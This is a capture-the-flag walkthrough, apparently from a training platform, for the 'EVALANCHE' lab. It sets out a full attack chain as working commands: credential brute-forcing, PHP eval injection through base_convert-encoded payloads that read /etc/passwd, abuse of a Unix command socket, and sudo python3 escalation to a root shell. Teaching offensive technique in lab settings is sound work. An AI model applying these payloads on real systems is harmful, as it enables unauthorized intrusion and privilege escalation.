Avatar

Labs / EVALANCHE

  • Hard
  • Released 01 Jul 2025
The lab needs to be started first.
Need help to start?
Hard

EVALANCHE - Complete Solution Walkthrough

Initial Reconnaissance

  1. Start with a comprehensive nmap scan to identify open ports and services:
nmap -Pn -sS -sV -O -p- <target-ip>
  1. The scan reveals two open ports:
  • Port 22: SSH service
  • Port 8080: HTTP service (web application)
  1. Access the web application at http://<target-ip>:8080
  2. The application appears to be a device management system with multiple features

Authentication System Analysis

  1. Discover the legacy access system that takes a name and date to generate a fingerprint
  2. The system uses MD5 hashing to generate fingerprints from the combination of name and date
  3. Test the system manually to understand how it works:
  • Input: name + date
  • Output: MD5 hash of the combination
  1. Check the documentation to confirm MD5 is used for fingerprint generation
  2. Review the FAQ page which mentions that some admins use this system as an authentication system
  3. Examine the API documentation for hidden notes about admin users
  4. Find a hidden note indicating admin users with dates after October 2024

Brute Force Attack

  1. Create a Python script to brute force admin credentials using common usernames and date ranges
  2. Test usernames: admin, Admin, ADMIN, adm1n
  3. Test date range starting from October 2024 onwards
  4. For each combination, submit to the legacy authentication system and check if admin access is granted
  5. Monitor the response to identify when admin privileges are obtained
  6. The script should check the dashboard response to determine if admin access was successful
  7. Use session management to maintain authentication state
  8. Working combination found: admin / 2024-11-27

Admin Access and Code Execution

  1. Once admin credentials are found, access the main application as admin
  2. Discover new features available to admin users
  3. Access a tool that allows two functions: pi() and base_convert()
  4. Realize that PHP is being used and the tool runs eval() in the background
  5. Test base_convert function to understand its capabilities
  6. Discover that base_convert can convert decimal to base36, which represents binary data in ASCII string format
  7. Exploit base_convert to execute system commands using:
base_convert(1751504350,10,36)(base_convert(784,10,36))
  1. This translates to system(ls) when converted
  2. Verify command execution works by running system(cat /etc/passwd)

Information Gathering and SSH Access

  1. Use the command execution to read the backup file backup_5698832747.txt
  2. Execute: system(cat bac*) using base_convert encoding
  3. The command: base_convert(1751504350,10,36)(base_convert(37907361743,10,36)(base_convert(477080140104,10,36).base_convert(474903309826,10,36)))
  4. This reveals SSH credentials for initial foothold
  5. Use the discovered SSH credentials to connect to the system

Initial Foothold and Enumeration

  1. SSH into the system using the discovered credentials
  2. Explore the user's home directory and available files
  3. Check the /tmp directory for any temporary files or sockets
  4. Discover a socket file at /tmp/dev.sock
  5. Find a temp.txt file in /tmp with information about the socket
  6. The temp.txt file indicates the socket is for running commands and reading/writing files

Unix Socket Exploitation

  1. Connect to the UNIX socket at /tmp/dev.sock using netcat or Python
  2. The socket accepts commands with 'exec', 'read', and 'write' prefixes
  3. Method 1 - Using netcat (if available):
# Try traditional netcat (may not work on all systems)
nc /tmp/dev.sock

# Or try with -U flag (GNU netcat)
nc -U /tmp/dev.sock

# Alternative: use socat if available
socat - UNIX-CONNECT:/tmp/dev.sock
  1. Method 2 - Using Python (Recommended):
import socket

def exec_command(command):
    s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    s.connect("/tmp/dev.sock")
    s.send(f"exec {command}\n".encode())
    response = s.recv(4096)
    print(response.decode())

def read_file(filename):
    s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    s.connect("/tmp/dev.sock")
    s.send(f"read {filename}\n".encode())
    response = s.recv(4096)
    print(response.decode())

# List developer's home directory
exec_command("ls -la /home/developer")

# Read the note.txt file
read_file("/home/developer/note.txt")
  1. Method 3 - One-liner Python commands:
# List developer's home directory
python3 -c "import socket; s=socket.socket(socket.AF_UNIX,socket.SOCK_STREAM); s.connect('/tmp/dev.sock'); s.send(b'exec ls -la /home/developer\n'); print(s.recv(4096).decode())"

# Read the note.txt file
python3 -c "import socket; s=socket.socket(socket.AF_UNIX,socket.SOCK_STREAM); s.connect('/tmp/dev.sock'); s.send(b'read /home/developer/note.txt\n'); print(s.recv(4096).decode())"
  1. Once connected (using any method), use the exec command to list the contents of the developer's home directory:
exec ls -la /home/developer
  1. This will reveal the contents of the /home/developer directory, including the note.txt file
  2. Use the read command to read the note.txt file:
read /home/developer/note.txt
  1. The note.txt file reveals developer credentials and information about the socket's purpose
  2. Use the discovered credentials to switch to the developer user

Privilege Escalation

  1. Switch to the developer user using the discovered credentials
  2. Check sudo permissions using 'sudo -l'
  3. Discover that developer can run pip and python3 with sudo
  4. Exploit sudo python3 to execute commands with elevated privileges
  5. Use the command: sudo python3 -c 'import os; os.system("/bin/sh")'
  6. This provides a root shell
  7. Access the root flag at /root/flag-root.txt

Flag Locations and Timing

User Flag
  • When to grab: After gaining SSH access and initial foothold on the system
  • Where to find: /home/ctf/flag-user.txt
  • How to access: cat /home/ctf/flag-user.txt
  • Prerequisites: Must have successfully brute-forced admin credentials, exploited the web application for code execution, discovered SSH credentials from the backup file, and established SSH connection
Root Flag
  • When to grab: After completing privilege escalation to root
  • Where to find: /root/flag-root.txt
  • How to access: cat /root/flag-root.txt
  • Prerequisites: Must have exploited the Unix socket to gain developer privileges, discovered developer credentials, and exploited sudo misconfiguration to obtain root access

Alternative Methods

  1. Could also exploit sudo pip to install a malicious package
  2. Create a fake package that executes commands as root
  3. Use sudo python3 for direct command execution

Key Learning Points

  • Legacy authentication systems can be vulnerable to brute force attacks
  • MD5-based authentication can be reverse-engineered
  • PHP base_convert function can be exploited for code execution
  • UNIX sockets can provide alternative access methods
  • Sudo misconfigurations can lead to privilege escalation
  • Systematic enumeration is crucial for complex challenges
  • Backup files can contain valuable information
  • Session management is important in web application testing

Tools Used

  • nmap - Network reconnaissance
  • Python - Brute force script development and socket communication
  • SSH client - Remote access
  • Web browser - Web application testing
  • Burp Suite (optional) - Web application proxy
  • Netcat - Unix socket communication

Challenge Summary

This challenge demonstrates a sophisticated attack chain involving:

  1. Web application reconnaissance and authentication bypass
  2. Brute force attack against MD5-based authentication
  3. PHP code execution through base_convert function exploitation
  4. Information disclosure through backup files
  5. SSH access for initial foothold
  6. UNIX socket exploitation for privilege escalation
  7. Sudo misconfiguration exploitation for root access